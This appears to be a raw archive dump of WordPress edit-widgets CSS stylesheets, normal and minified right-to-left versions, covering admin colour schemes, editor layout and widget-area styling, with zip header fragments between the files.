--wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!kHdddist/edit-widgets/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .interface-complementary-area-header{ background:#fff; gap:4px; padding-left:8px; } .interface-complementary-area-header .interface-complementary-area-header__title{ margin:0 0 0 auto; } .interface-complementary-area{ background:#fff; color:#1e1e1e; height:100%; overflow:auto; } @media (min-width:600px){ .interface-complementary-area{ -webkit-overflow-scrolling:touch; } } @media (min-width:782px){ .interface-complementary-area{ width:280px; } } .interface-complementary-area .components-panel{ border:none; position:relative; z-index:0; } .interface-complementary-area .components-panel__header{ position:sticky; top:0; z-index:1; } .interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{ top:0; } .interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){ margin-top:0; } .interface-complementary-area h2{ color:#1e1e1e; font-size:13px; font-weight:500; margin-bottom:1.5em; } .interface-complementary-area h3{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .interface-complementary-area hr{ border-bottom:1px solid #f0f0f0; border-top:none; margin:1.5em 0; } .interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{ box-shadow:none; margin-bottom:1.5em; } .interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{ margin-bottom:0; } .interface-complementary-area .block-editor-skip-to-selected-block:focus{ bottom:10px; left:10px; right:auto; top:auto; } .interface-complementary-area__fill{ height:100%; } @media (min-width:782px){ body.js.is-fullscreen-mode{ height:calc(100% + 32px); margin-top:-32px; } body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{ display:none; } body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{ margin-right:0; } } html.interface-interface-skeleton__html-container{ position:fixed; width:100%; } @media (min-width:782px){ html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){ position:static; width:auto; } } .interface-interface-skeleton{ bottom:0; display:flex; flex-direction:row; height:auto; left:0; max-height:100%; position:fixed; top:46px; } @media (min-width:783px){ .interface-interface-skeleton{ top:32px; } .is-fullscreen-mode .interface-interface-skeleton{ top:0; } } .interface-interface-skeleton__editor{ display:flex; flex:0 1 100%; flex-direction:column; overflow:hidden; } .interface-interface-skeleton{ right:0; } @media (min-width:783px){ .interface-interface-skeleton{ right:160px; } } @media (min-width:783px){ .auto-fold .interface-interface-skeleton{ right:36px; } } @media (min-width:961px){ .auto-fold .interface-interface-skeleton{ right:160px; } } .folded .interface-interface-skeleton{ right:0; } @media (min-width:783px){ .folded .interface-interface-skeleton{ right:36px; } } body.is-fullscreen-mode .interface-interface-skeleton{ right:0 !important; } .interface-interface-skeleton__body{ display:flex; flex-grow:1; overflow:auto; overscroll-behavior-y:none; position:relative; } @media (min-width:782px){ .has-footer .interface-interface-skeleton__body{ padding-bottom:25px; } } .interface-interface-skeleton__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; z-index:20; } @media (min-width:782px){ .interface-interface-skeleton__content{ z-index:auto; } } .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ background:#fff; bottom:0; color:#1e1e1e; flex-shrink:0; position:absolute; right:0; top:0; width:auto; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{ position:relative !important; } } .interface-interface-skeleton__sidebar{ border-top:1px solid #e0e0e0; overflow:hidden; } @media (min-width:782px){ .interface-interface-skeleton__sidebar{ box-shadow:1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__secondary-sidebar{ border-top:1px solid #e0e0e0; left:0; } @media (min-width:782px){ .interface-interface-skeleton__secondary-sidebar{ box-shadow:-1px 0 0 0 rgba(0,0,0,.133); outline:1px solid #0000; } } .interface-interface-skeleton__header{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); color:#1e1e1e; flex-shrink:0; height:auto; outline:1px solid #0000; z-index:30; } .interface-interface-skeleton__footer{ background-color:#fff; border-top:1px solid #e0e0e0; bottom:0; color:#1e1e1e; display:none; flex-shrink:0; height:auto; position:absolute; right:0; width:100%; z-index:90; } @media (min-width:782px){ .interface-interface-skeleton__footer{ display:flex; } } .interface-interface-skeleton__footer .block-editor-block-breadcrumb{ align-items:center; background:#fff; display:flex; font-size:13px; height:24px; padding:0 18px; z-index:30; } .interface-interface-skeleton__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:0; position:fixed !important; right:auto; top:-9999em; width:100vw; z-index:100000; } @media (min-width:782px){ .interface-interface-skeleton__actions{ width:280px; } } .interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{ bottom:0; top:auto; } .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:46px; } @media (min-width:782px){ .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ border-right:1px solid #ddd; top:32px; } .is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{ top:0; } } .interface-pinned-items{ display:flex; } .interface-pinned-items .components-button{ display:none; margin:0; } .interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{ display:flex; } .interface-pinned-items .components-button svg{ max-height:24px; max-width:24px; } @media (min-width:600px){ .interface-pinned-items .components-button{ display:flex; } } .interface-pinned-items{ gap:8px; } .wp-block[data-type="core/widget-area"]{ margin-left:auto; margin-right:auto; max-width:700px; } .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title{ background:#fff; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; height:48px; margin:0; position:relative; transform:translateZ(0); z-index:1; } .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title:hover{ background:#fff; } .wp-block[data-type="core/widget-area"] .block-list-appender.wp-block{ position:relative; width:auto; } .wp-block[data-type="core/widget-area"] .editor-styles-wrapper .wp-block.wp-block.wp-block.wp-block.wp-block{ max-width:100%; } .wp-block[data-type="core/widget-area"] .components-panel__body.is-opened{ padding:0; } .blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper{ margin:0; padding:0; } .blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper>.block-editor-block-list__layout{ margin-top:-48px; min-height:32px; padding:72px 16px 16px; } .wp-block-widget-area__highlight-drop-zone{ outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color); } body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title,body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title *{ pointer-events:none; } .edit-widgets-error-boundary{ box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; margin:64px auto auto; max-width:780px; padding:20px; } .edit-widgets-header{ align-items:center; background:#fff; display:flex; height:64px; justify-content:space-between; overflow:auto; } @media (min-width:600px){ .edit-widgets-header{ overflow:visible; } } .edit-widgets-header .selected-block-tools-wrapper{ align-items:center; display:flex; height:64px; overflow:hidden; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-contextual-toolbar{ border-bottom:0; height:100%; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar{ height:100%; padding-top:17px; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){ height:32px; } .edit-widgets-header .selected-block-tools-wrapper .components-toolbar,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group{ border-left:none; } .edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar:after{ background-color:#ddd; content:""; height:24px; margin-right:8px; margin-top:4px; width:1px; } .edit-widgets-header .selected-block-tools-wrapper .components-toolbar .components-toolbar-group.components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{ display:none; } .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{ height:32px; overflow:visible; } @media (min-width:600px){ .edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{ position:relative; top:-10px; } } .edit-widgets-header__navigable-toolbar-wrapper{ align-items:center; display:flex; flex-shrink:2; height:64px; justify-content:center; overflow:hidden; padding-left:8px; padding-right:16px; } .edit-widgets-header__title{ font-size:20px; margin:0 0 0 20px; padding:0; } .edit-widgets-header__actions{ align-items:center; display:flex; padding-left:4px; } @media (min-width:600px){ .edit-widgets-header__actions{ padding-left:8px; } } .edit-widgets-header__actions{ gap:8px; } .edit-widgets-header-toolbar{ gap:8px; margin-left:8px; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon{ height:32px; min-width:32px; padding:4px; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon.is-pressed,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon.is-pressed{ background:#1e1e1e; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:focus:not(:disabled),.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 1px #fff; outline:1px solid #0000; } .edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:before,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:before{ display:none; } .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{ padding-left:8px; padding-right:8px; } @media (min-width:600px){ .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{ padding-left:12px; padding-right:12px; } } .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle:after{ content:none; } @media not (prefers-reduced-motion){ .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle svg{ transition:transform .2s cubic-bezier(.165, .84, .44, 1); } } .edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle.is-pressed svg{ transform:rotate(-45deg); } .edit-widgets-keyboard-shortcut-help-modal__section{ margin:0 0 2rem; } .edit-widgets-keyboard-shortcut-help-modal__section-title{ font-size:.9rem; font-weight:600; } .edit-widgets-keyboard-shortcut-help-modal__shortcut{ align-items:baseline; border-top:1px solid #ddd; display:flex; margin-bottom:0; padding:.6rem 0; } .edit-widgets-keyboard-shortcut-help-modal__shortcut:last-child{ border-bottom:1px solid #ddd; } .edit-widgets-keyboard-shortcut-help-modal__shortcut:empty{ display:none; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-term{ font-weight:600; margin:0 1rem 0 0; text-align:left; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-description{ flex:1; margin:0; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ background:none; display:block; margin:0; padding:0; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{ margin-top:10px; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key{ border-radius:8%; margin:0 .2rem; padding:.25rem .5rem; } .edit-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{ margin:0 .2rem 0 0; } .components-panel__header.edit-widgets-sidebar__panel-tabs{ padding-right:0; } .edit-widgets-widget-areas__top-container{ display:flex; padding:16px; } .edit-widgets-widget-areas__top-container .block-editor-block-icon{ margin-left:16px; } .edit-widgets-notices__snackbar{ bottom:20px; left:0; padding-left:16px; padding-right:16px; position:fixed; right:0; } @media (min-width:783px){ .edit-widgets-notices__snackbar{ right:160px; } } @media (min-width:783px){ .auto-fold .edit-widgets-notices__snackbar{ right:36px; } } @media (min-width:961px){ .auto-fold .edit-widgets-notices__snackbar{ right:160px; } } .folded .edit-widgets-notices__snackbar{ right:0; } @media (min-width:783px){ .folded .edit-widgets-notices__snackbar{ right:36px; } } body.is-fullscreen-mode .edit-widgets-notices__snackbar{ right:0 !important; } .edit-widgets-notices__dismissible .components-notice,.edit-widgets-notices__pinned .components-notice{ border-bottom:1px solid #0003; box-sizing:border-box; min-height:64px; padding:0 12px; } .edit-widgets-notices__dismissible .components-notice .components-notice__dismiss,.edit-widgets-notices__pinned .components-notice .components-notice__dismiss{ margin-top:12px; } .edit-widgets-layout__inserter-panel{ display:flex; flex-direction:column; height:100%; } .edit-widgets-layout__inserter-panel .block-editor-inserter__menu{ overflow:hidden; } .edit-widgets-layout__inserter-panel-content{ height:calc(100% - 44px); } .edit-widgets-layout__inserter-panel-content .block-editor-inserter__tablist-and-close{ display:none; } @media (min-width:782px){ .edit-widgets-layout__inserter-panel-content{ height:100%; } } .components-popover.more-menu-dropdown__content{ z-index:99998; } .edit-widgets-welcome-guide{ width:312px; } .edit-widgets-welcome-guide__image{ background:#00a0d2; margin:0 0 16px; } .edit-widgets-welcome-guide__image>img{ display:block; max-width:100%; object-fit:cover; } .edit-widgets-welcome-guide__heading{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:24px; line-height:1.4; margin:16px 0; padding:0 32px; } .edit-widgets-welcome-guide__text{ font-size:13px; line-height:1.4; margin:0 0 24px; padding:0 32px; } .edit-widgets-welcome-guide__inserter-icon{ margin:0 4px; vertical-align:text-top; } .edit-widgets-block-editor{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; position:relative; } .edit-widgets-block-editor,.edit-widgets-block-editor .block-editor-writing-flow,.edit-widgets-block-editor>div:last-of-type{ display:flex; flex-direction:column; flex-grow:1; } .edit-widgets-block-editor .edit-widgets-main-block-list{ height:100%; } .edit-widgets-block-editor .components-button{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .edit-widgets-block-editor .components-button.has-icon,.edit-widgets-block-editor .components-button.is-tertiary{ padding:6px; } .edit-widgets-editor__list-view-panel{ display:flex; flex-direction:column; height:100%; min-width:350px; } .edit-widgets-editor__list-view-panel-content{ height:calc(100% - 44px); overflow-y:auto; padding:8px; } .edit-widgets-editor__list-view-panel-header{ align-items:center; border-bottom:1px solid #ddd; display:flex; height:48px; justify-content:space-between; padding-left:8px; padding-right:16px; } body.js.appearance_page_gutenberg-widgets,body.js.widgets-php{ background:#fff; } body.js.appearance_page_gutenberg-widgets #wpcontent,body.js.widgets-php #wpcontent{ padding-right:0; } body.js.appearance_page_gutenberg-widgets #wpbody-content,body.js.widgets-php #wpbody-content{ padding-bottom:0; } body.js.appearance_page_gutenberg-widgets #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.appearance_page_gutenberg-widgets #wpfooter,body.js.widgets-php #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.widgets-php #wpfooter{ display:none; } body.js.appearance_page_gutenberg-widgets .a11y-speak-region,body.js.widgets-php .a11y-speak-region{ right:-1px; top:-1px; } body.js.appearance_page_gutenberg-widgets ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-widgets ul#adminmenu>li.current>a.current:after,body.js.widgets-php ul#adminmenu a.wp-has-current-submenu:after,body.js.widgets-php ul#adminmenu>li.current>a.current:after{ border-left-color:#fff; } body.js.appearance_page_gutenberg-widgets .media-frame select.attachment-filters:last-of-type,body.js.widgets-php .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } .blocks-widgets-container{ box-sizing:border-box; } .blocks-widgets-container *,.blocks-widgets-container :after,.blocks-widgets-container :before{ box-sizing:inherit; } @media (min-width:600px){ .blocks-widgets-container{ bottom:0; left:0; min-height:calc(100vh - 46px); position:absolute; right:0; top:0; } } @media (min-width:782px){ .blocks-widgets-container{ min-height:calc(100vh - 32px); } } .blocks-widgets-container .interface-interface-skeleton__content{ background-color:#f0f0f0; } .blocks-widgets-container .editor-styles-wrapper{ margin:auto; max-width:700px; } .edit-widgets-sidebar .components-button.interface-complementary-area__pin-unpin-item{ display:none; } .js .widgets-php .notice{ display:none !important; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!>Z[Z[#dist/edit-widgets/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.interface-complementary-area-header{background:#fff;gap:4px;padding-left:8px}.interface-complementary-area-header .interface-complementary-area-header__title{margin:0 0 0 auto}.interface-complementary-area{background:#fff;color:#1e1e1e;height:100%;overflow:auto}@media (min-width:600px){.interface-complementary-area{-webkit-overflow-scrolling:touch}}@media (min-width:782px){.interface-complementary-area{width:280px}}.interface-complementary-area .components-panel{border:none;position:relative;z-index:0}.interface-complementary-area .components-panel__header{position:sticky;top:0;z-index:1}.interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{top:0}.interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){margin-top:0}.interface-complementary-area h2{color:#1e1e1e;font-size:13px;font-weight:500;margin-bottom:1.5em}.interface-complementary-area h3{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.interface-complementary-area hr{border-bottom:1px solid #f0f0f0;border-top:none;margin:1.5em 0}.interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{box-shadow:none;margin-bottom:1.5em}.interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{margin-bottom:0}.interface-complementary-area .block-editor-skip-to-selected-block:focus{bottom:10px;left:10px;right:auto;top:auto}.interface-complementary-area__fill{height:100%}@media (min-width:782px){body.js.is-fullscreen-mode{height:calc(100% + 32px);margin-top:-32px}body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{display:none}body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{margin-right:0}}html.interface-interface-skeleton__html-container{position:fixed;width:100%}@media (min-width:782px){html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){position:static;width:auto}}.interface-interface-skeleton{bottom:0;display:flex;flex-direction:row;height:auto;left:0;max-height:100%;position:fixed;top:46px}@media (min-width:783px){.interface-interface-skeleton{top:32px}.is-fullscreen-mode .interface-interface-skeleton{top:0}}.interface-interface-skeleton__editor{display:flex;flex:0 1 100%;flex-direction:column;overflow:hidden}.interface-interface-skeleton{right:0}@media (min-width:783px){.interface-interface-skeleton{right:160px}}@media (min-width:783px){.auto-fold .interface-interface-skeleton{right:36px}}@media (min-width:961px){.auto-fold .interface-interface-skeleton{right:160px}}.folded .interface-interface-skeleton{right:0}@media (min-width:783px){.folded .interface-interface-skeleton{right:36px}}body.is-fullscreen-mode .interface-interface-skeleton{right:0!important}.interface-interface-skeleton__body{display:flex;flex-grow:1;overflow:auto;overscroll-behavior-y:none;position:relative}@media (min-width:782px){.has-footer .interface-interface-skeleton__body{padding-bottom:25px}}.interface-interface-skeleton__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto;z-index:20}@media 